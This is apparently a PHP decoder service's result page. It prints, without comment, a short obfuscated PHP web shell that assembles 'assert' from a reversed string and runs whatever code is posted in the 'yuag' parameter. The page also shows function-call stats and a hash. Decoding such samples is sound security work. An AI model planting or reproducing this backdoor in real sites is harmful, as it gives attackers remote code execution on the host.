Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php error_reporting(0); $b="zxczxczxczxczxcxzczx"; function yuag_array($b,$c){ $b=s..
Decoded Output download
www.yuag.org
Did this file decode correctly?
Original Code
<?php
error_reporting(0);
$b="zxczxczxczxczxcxzczx";
function yuag_array($b,$c){
$b=strrev($b);
print "www.yuag.org";
array_map(substr_replace($b, 'ss', 1, 0),array($c));
}
yuag_array("trea",$_POST['yuag']);
Function Calls
| strrev | 1 |
| yuag_array | 1 |
| substr_replace | 1 |
| error_reporting | 1 |
Stats
| MD5 | 2a27f4d82db037087446c07b5ce52c79 |
| Eval Count | 0 |
| Decode Time | 110 ms |